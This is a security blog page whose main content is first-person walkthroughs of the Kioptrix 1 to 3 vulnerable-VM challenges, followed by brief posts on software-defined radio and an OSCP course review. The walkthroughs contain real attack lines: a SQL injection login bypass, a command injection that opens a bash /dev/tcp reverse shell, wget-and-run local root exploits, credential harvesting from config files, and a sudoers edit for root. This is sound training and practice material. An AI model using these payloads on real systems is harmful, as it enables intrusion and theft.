The Evil Bit Blog

Monday, November 4, 2013

Kioptrix Level 3 - Walkthrough

It's definitely getting more difficult. Let's see. The NMAP scan showed the following:

root@kali:~# nmap -sS -A 192.168.1.20

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-03 22:04 CET
Nmap scan report for 192.168.1.20
Host is up (0.00062s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:17:F3:43 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms 192.168.1.20

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

I went to the website, and after some navigation I found that it's running Lotus CMS web application.

I found two exploits on exploit-db, one of them was for Metasploit, which I didn't wanted to use (although I tried the exploit and it worked), and the other didn't work. I found another one, which is a bash script of the Metasploit version:

https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh

It worked really nice, and I got a reverse shell:

About to try and inject reverse shell....
what IP to use?
192.168.1.17
What PORT?
4444

OK, open your local listener and choose the method for back connect:
1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1

---------------------------

root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.17] from (UNKNOWN) [192.168.1.20] 59701
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
pwd
/home/www/kioptrix3.com

I tried quite a few local privilege escalation exploits but neither of them worked.

I did some further enumeration and found that there is an interesting file which has the suid bit set (/usr/local/bin/ht).

$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/apache2/suexec
/usr/lib/pt_chown
/usr/bin/arping
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/local/bin/ht
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/su

However I couldn't run it from here, cause I didn't have full terminal access. I need SSH! Argh...

I moved on to do some further enumeration. In the passwd file I found 2 other normal users (beside root):

root:x:0:0:root:/root:/bin/bash
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

I looked on the webapp configs hoping I will find a password for the MySQL database on the system. I found it in the gconfig.php file:

www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
cat gconfig.php
<?php
    error_reporting(0);
    /*
        A sample Gallarific configuration file. You should edit
        the installer details below and save this file as gconfig.php
        Do not modify anything else if you don't know what it is.
    */

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as http://www.yoursite.com/gallery
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

    // Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
        echo("A connection to the database couldn't be established: " . mysql_error());
        die();
}else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
        die();
    }else {
        $settings=mysql_query("select * from gallarific_settings");
        if(mysql_num_rows($settings)!=0){
            while($data=mysql_fetch_array($settings)){
                $GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
            }
        }

    }
}

?>
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$

I logged in to the database and after browsing the tables, I found passwords for the two users on the machine.

After doing a Google search I found the password for the MD5 hashes:

md5(Mast3r) = 0d3eccfb887aabd50f243b3f155c0f85
md5(starwars) = 5badcaf789d3d1d09794d8f021f40f0e

It turned out that both passwords were working on SSH as well. The better account was "loneferret". After login I found that it can run "ht" editor with root privileges.

I could open the shadow file:

But it takes lot of time to find the password for root. I could open the sudoers file:

This is a very poor editor, works only in hex, so the simpliest was to modify the line:

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

loneferret ALL=NOPASSWD: /bin/su, /usr/local/bin/ht

That means that I can run the "su" command as well, w/o password.

After saving I could run "sudo su", and I got root access.

Sunday, November 3, 2013

Kioptrix Level 2 - Walkthrough

So, Level 1 was way too easy, Level 2 was a little bit trickier, but also not hard. I found it more interesting. Let's see:

The detailed NMAP scan results were the following:

root@kali:~# nmap -sS -A 192.168.1.19

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-03 08:15 CET

Nmap scan report for 192.168.1.19

Host is up (0.00035s latency).

Not shown: 994 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)

|_sshv1: Server supports SSHv1

80/tcp open http Apache httpd 2.0.52 ((CentOS))

|_http-methods: No Allow or Public header in OPTIONS response (status code 200)

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

111/tcp open rpcbind 2 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2 111/tcp rpcbind

| 100000 2 111/udp rpcbind

| 100024 1 623/udp status

|_ 100024 1 626/tcp status

443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))

|_http-methods: No Allow or Public header in OPTIONS response (status code 200)

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--

| Not valid before: 2009-10-07T23:10:47+00:00

|_Not valid after: 2010-10-07T23:10:47+00:00

|_ssl-date: 2013-11-03T04:05:56+00:00; -3h09m48s from local time.

| sslv2:

| SSLv2 supported

| ciphers:

| SSL2_DES_192_EDE3_CBC_WITH_MD5

| SSL2_RC2_CBC_128_CBC_WITH_MD5

| SSL2_RC4_128_WITH_MD5

| SSL2_RC4_64_WITH_MD5

| SSL2_DES_64_CBC_WITH_MD5

| SSL2_RC2_CBC_128_CBC_WITH_MD5

|_ SSL2_RC4_128_EXPORT40_WITH_MD5

631/tcp open ipp CUPS 1.1

| http-methods: Potentially risky methods: PUT

|_See http://nmap.org/nsedoc/scripts/http-methods.html

|_http-title: 403 Forbidden

3306/tcp open mysql MySQL (unauthorized)

MAC Address: 00:0C:29:91:C9:95 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.30

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS

1 0.35 ms 192.168.1.19

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds

Again, I went for the webserver again (I don't hate webservers or something :)). This time I got to an interesting webpage (on L1 it was only a default HTML). It was a login page, and I tried a simple SQL injection - from the NMAP scan I knew the server is running mysql, so that helped. I used:

admin' OR 1=1 #

and it let me in, and I got a page, where I could execute ping command.

As the output of the command looked like a system output, I thought that I could append other commands to it, in order to execute arbitrary commands. It turned out that I was right, and I could read files, or even open a reverse shell back to my computer. Some nice tricks to get rshell:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Commands used on the page:

192.168.1.1;cat /etc/passwd

192.168.1.1;bash -i >& /dev/tcp/192.168.1.17/4444 0>&1

After getting a shell on the victim, I saw that I was running with "apache" privileges.

root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.17] from (UNKNOWN) [192.168.1.19] 32771
bash: no job control in this shellbash-3.00$
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ pwd
/var/www/html
bash-3.00$ uname -r
2.6.9-55.EL

Before I got root, I did some enumeration (most important!!!), and could reveal some interesting stuff - it didn't lead to a root account, but still was good.

From the webpage source I could retrieve a myslq login password:

bash-3.00$ cat index.php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());

(...)

I could login to mysql, but my shell, wasn't fully interactive, so I executed a one line python script in order to make it fully interactive:

python -c 'import pty;pty.spawn("/bin/sh")'

bash-3.00$ python -c 'import pty;pty.spawn("/bin/sh")'
sh-3.00$ mysql -u john -p
mysql -u john -p
Enter password: hiroshima

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 22969 to server version: 4.1.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

mysql> select * from user;
select * from user;
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
| Host                  | User | Password         | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections |
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
| localhost             | root | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                |          |            |             |              |             0 |           0 |               0 |
| localhost.localdomain | root | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                |          |            |             |              |             0 |           0 |               0 |
| localhost.localdomain |      |                  | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
| localhost             |      |                  | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
| localhost             | john | 5a6914ba69e02807 | Y           | Y           | Y           | Y           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                |          |            |             |              |             0 |           0 |               0 |
+-----------------------+------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+
5 rows in set (0.00 sec)

mysql> exit
exit
Bye
sh-3.00$ mysql -u root -p
mysql -u root -p
Enter password: hiroshima

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 22971 to server version: 4.1.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

As you can see above I could query the mysql user table. The password hash for root and john are the same, so knowing the password for john already gave me the root pw for the database.

This is nice, but I'm still not root (at least not on the system). After looking on the Linuy kernel version and making a quick Google search gave the exploit in first hit:

Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit

http://www.exploit-db.com/exploits/9542/

After downloading I copied it to the victim with wget, compiled and finally run it, and again, I got root.

sh-3.00$ uname -r

uname -r

2.6.9-55.EL

sh-3.00$ wget http://192.168.1.17/0x82-CVE-2009-2698.c

wget http://192.168.1.17/0x82-CVE-2009-2698.c

--01:33:26-- http://192.168.1.17/0x82-CVE-2009-2698.c

=> `0x82-CVE-2009-2698.c'

Connecting to 192.168.1.17:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 2,645 (2.6K) [text/x-csrc]

100%[====================================>] 2,645 --.--K/s

01:33:26 (813.29 KB/s) - `0x82-CVE-2009-2698.c' saved [2645/2645]

sh-3.00$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698

gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698

sh-3.00# id

uid=0(root) gid=0(root) groups=48(apache)

I found this level more interesting, because of the special web application.

Kioptrix - What is that?

I just started the Kioptrix walkthroughs, however I just realized, that I didn't mention what they are. So if someone doesn't know, Kioptrix has 4 challenges released through 4 different virtual machines, and the goal is to gain root on each VM. The difficulty of each level should be harder and harder.

The website: http://www.kioptrix.com/

I didn't have a chance to practice or do such things since I finished PWB / OSCP in May, so I thought it would be good to do these sort of ethical hacking challenges again, and my plan for now is to go through the Kioptrix ones, and Metasploitable. I won't have time for others now, but I hope to do them later.

g0tm1lk has a very good collection of all kind of challenges, which can be found here:
http://blog.g0tmi1k.com/2011/03/vulnerable-by-design.html

Saturday, November 2, 2013

Kioptrix Level 1 - Walkthrough

I started with loading the VM on the same network as my Kali Linux was. I started with a ping scan on the network, cause I didn't know what IP the VM got.

root@kali:~# nmap -P0 192.168.1.0/24

(...)
Nmap scan report for 192.168.1.104
Host is up (0.00051s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open ssh
80/tcp   open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:02:82:DB (VMware)
(...)

After that I found the host I did a more exhaustive TCP SYN scan on the host.

root@kali:~# nmap -sS -A 192.168.1.104

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-02 20:04 CET
Nmap scan report for 192.168.1.104
Host is up (0.00048s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open ssh         OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto service
|   100000 2            111/tcp rpcbind
|   100000 2            111/udp rpcbind
|   100024 1           1024/tcp status
|_ 100024 1           1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after: 2010-09-26T08:32:06+00:00
|_ssl-date: 2013-11-02T20:07:02+00:00; +1h01m50s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status      1 (RPC #100024)
MAC Address: 00:0C:29:02:82:DB (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

TRACEROUTE
HOP RTT     ADDRESS
1   0.48 ms 192.168.1.104

From the above list we can see that we have a bunch of pretty old services. I did a Google search for the Apache version, and came across the following exploit:

Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)
http://www.exploit-db.com/exploits/764/

It was really promising. We had SSL service running as well. After downloading I had to add two lines to the exploit code in order to get it compiled + commented out a command, which was not needed.

#include <openssl/rc4.h>
#include <openssl/md5.h>

// wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"

Once it compiled, I searched for the version I need and run it (we know the Apache version, and that the Linux is RedHat), and voila... I got a reverse shell, with limited privileges.

root@kali:~# ./OpenFuck | grep 1.3.20
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)

root@kali:~# ./OpenFuck 0x6b 192.168.1.104

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp;
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ uname -r
uname -r
2.4.7-10

Now I only need to get root. The original exploit wanted to download a ptrace exploit. After checking the Linux kernel version, I could see that it could work, so I downloaded the code and compiled it.

Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit
http://www.exploit-db.com/exploits/3/

I had to modify one line in the exploit in order to get it work:

#include <linux/user.h>
to
#include <sys/user.h>

I copied it to my Apache directory and copied it to the victim machine with wget. After running it, I got root!

bash-2.05$ wget 192.168.1.17/p
wget 192.168.1.17/p
--15:42:35-- http://192.168.1.17/p
           => `p'
Connecting to 192.168.1.17:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 9,210

    0K ........                                              100% @ 691.86 KB/s

15:42:35 (691.86 KB/s) - `p' saved [9210/9210]

bash-2.05$ ls -l
ls -l
total 9
-rw-r--r--    1 apache   apache       9210 Nov 2 14:40 p
bash-2.05$ chmod 777 p
chmod 777 p

bash-2.05$ ./p
./p
[+] Attached to 5990
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -l
total 2
-rw-r--r--    1 root     root         1303 Sep 26 2009 anaconda-ks.cfg

This is only my way doing it, as this is the entry level, there could be other ways to get in.

SRD with Kali: gqrx

gqrx is a software defined radio receiver for Linux. It offers the following features:

Discover devices attached to the computer.
Process I/Q data from the supported devices.
Change frequency, gain and apply various corrections (frequency, I/Q balance).
AM, SSB, FM-N and FM-W (mono and stereo) demodulators.
Special FM mode for NOAA APT.
Variable band pass filter.
AGC, squelch and noise blankers.
FFT plot and waterfall.
Record and playback audio to / from WAV file.
Spectrum analyzer mode where all signal processing is disabled.

I tried it for listening to FM radio again, similar to the tool I used in Windows. We can start it from the command line with "gqrx" or by selecting it from the menu.

I tuned to one of the local radio stations, and it plays fine.

I'm not a radio amateur guy, so just experimenting so far. This is a very good blog for SDR:

http://www.rtl-sdr.com/

Tuesday, October 29, 2013

Software Defined Radio

Recently I bought a small USB receiver to play with SDR:
Terratec DVB-T USB Receiver - Realtek RTL2832U + Elonics E4000-Based

I want to experiment what you can do with this technology, and explore how Kali Linux support it, what tools are available there.
Update 2013/11/11 - I won't have time in the near future, but it's on the long (year) plan.

But first I set it up on Windows, here is a nice article how to do it:

http://rtlsdr.org/softwarewindows

After setting up, it works nicely, and I can listen to FM radio :) Here is a screenshot from SDR Sharp:

Wednesday, May 29, 2013

Review: Penetration Testing with Backtrack (PWB) / Offensive Security Certified Professional (OSCP)

I recently took the PWB course, and finally passed the OSCP exam (and I'm very happy now :))))))), that's why I was quite for long time.

This was one of the best training and certification I have ever taken. I knew before I have started that it will be very hard and time consuming, but it was even more than I expected. First, I’m not really experienced on this subject, I made the EC-Council’s CEH course before this, but that was mainly theory and very little practice. Having a C|EH did help, as the whole stuff was familiar (in theory!), and didn’t need to start from scratch.

The training itself starts with receiving about 350 page long study material (lab guide) and about 7 hours video. These are covering all the basics you need for the later lab exercises. They start with how to setup services in BT (Backtrack), what is and how to do port scanning, various service enumeration, information gathering in general. Then it moves forward for writing buffer overflow exploits, it goes through all the steps in very detailed manner. After that they teach you how to work with public exploits, basics of Metasploit framework and there are two client side exploit case studies as well. The next big subject is transferring files between machines (there are some really tricky ones), tunneling, pivoting, and password attacks. Finally they cover basics of SQL injection and XSS attacks. There are a few other smaller topics, but they are not really part of the exercises later. There are quite a few exercises for each module to practice the techniques, which all have to be documented and sent along the exam report at the end, but will talk about it later.

The big part is the remote lab. There is a big network with about 50 machines, and they try to simulate an existing organization with that. There are firewalls, proxy servers, machines are communicating with each other, so it’s pretty good. The big goal here is to attack all the machines and get root / admin access to all (or as many as you can/want to). I managed to own 46 machines. There are some very easy ones, and there are some which are really hard to get. My last and most difficult was “sufference” (you can have a guess, why the name is…), where I spent about 20-30 hours to get root on it; it was very-very tricky, and painful (oh, there is another box called “pain” – guess why :)). The training material teach you the basics, but you will have to go and learn a lot by your own, read about various services, OSes, application, and so on… because of the subject they just can’t cover everything, and this is really not the goal there, but to teach you to adapt and solve unknown problems, as you would face in real life. Will you spend hours in trying exploiting patched services, or other stuff, which won’t work? YES! Will you do it over and over again? YES! Will you hit your head to the desk, when you finally realize how to get in somewhere, and how stupid you were not seeing the forest because of the tree? Probably YES! :) All these part of the fun :) You can chat with the Offsec guys on IRC, but never expect them to give you a solution to any of the machines, if you go to them with some specific question, they may give you a hint, but that’s the maximum you can expect. Will you feel many times that you just can’t exploit a machine? YES! Will you get in later? Hopefully YES! I think their “Try Harder!” philosophy really works. Remember that all the machines are exploitable, and they are there to be exploited. All the boxes are different and almost all of them can be owned by different technique, so you can practice every type of attack, normal exploits, SQL injection, XSS attacks, client side exploits and so on. There are 4 networks in the lab separated by firewalls, proxy servers, as you would have in real life. You can practice various tunneling techniques there, and hopping from one machine to the next in the exploitation. I think if you are not a pentester, then you should get all of the machines in the lab, to get most out of the course. The lab time can be purchased for 30, 60 and 90 days, but if you feel it short, you can always extend it, as I did it (I went for 90 days + 30 days extension). I did the training after works and weekends, and I’m just lucky that my wife didn’t kill me for that :)

The exam. Obviously I can’t share details about it, but it’s a 24 hour long challenge, where you get access to another small network with a few machines, and similarly to the lab you need to get admin / root access on them. I really liked it, finally an exam, which not simple a lists of multi choice questions, but you really need to present your skills in practice, on a previously unknown environment (like on a Cisco CCIE). This is why it’s important to own all machines in the lab, to get prepared to the challenge, and face as many different systems as you can. Obviously you can use everything, as you could in a real world pentesting, but don’t expect the exam to be easy because of that. It’s hard. I started at 4PM (GMT+1), and progressed quite good, and at 1AM I already had enough points that I knew I will pass. So I went for a 6 hour sleep, and continued at 8AM, and quickly get my next machine. I decided to have a shower and breakfast then, and after that in another hour I completed everything. With that sad, it’s very important to take frequent breaks during the exam, as they can make huge difference; go and breathe some fresh air, your brain really needs oxygen :). I also prepared a list of commands I found very useful during the lab time, which became very handy during the exam.

The last part is to write the penetration test report about the exam, along with your recommendation how to fix the holes you have found. You have another 24 hours for that after the exam ends, so take notes, screenshots, etc… You need to make the same report for the lab network penetration testing and for the additional exercises you did during the training.

You get the results in 3 business days, but for me it was much quicker.

Overall I really enjoyed both the training and the exam, and I can’t say how much I learned during the last 4 months about this subject. It’s really worth its price, and much cheaper than any other similar training, you just need a lot of time, and even more time (I spent about 160-200 hours practicing in the lab after work and on weekends) – and most importantly a wife / girlfriend / family who will support you, and understand that you are not always available during this period :)

Links:

http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/
http://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/

Wednesday, March 13, 2013

Kali Linux Officially Released!!

Kali Linux Officialy released:

http://kali.org/

Friday, March 1, 2013

Computer Forensic Investigation w/ Backtrack

I took all my forensics related blog entries and created a single document from it, which can be downloaded from here:

Computer Forensic Investigation with Backtrack.pdf

I hope you will enjoy it.

Pages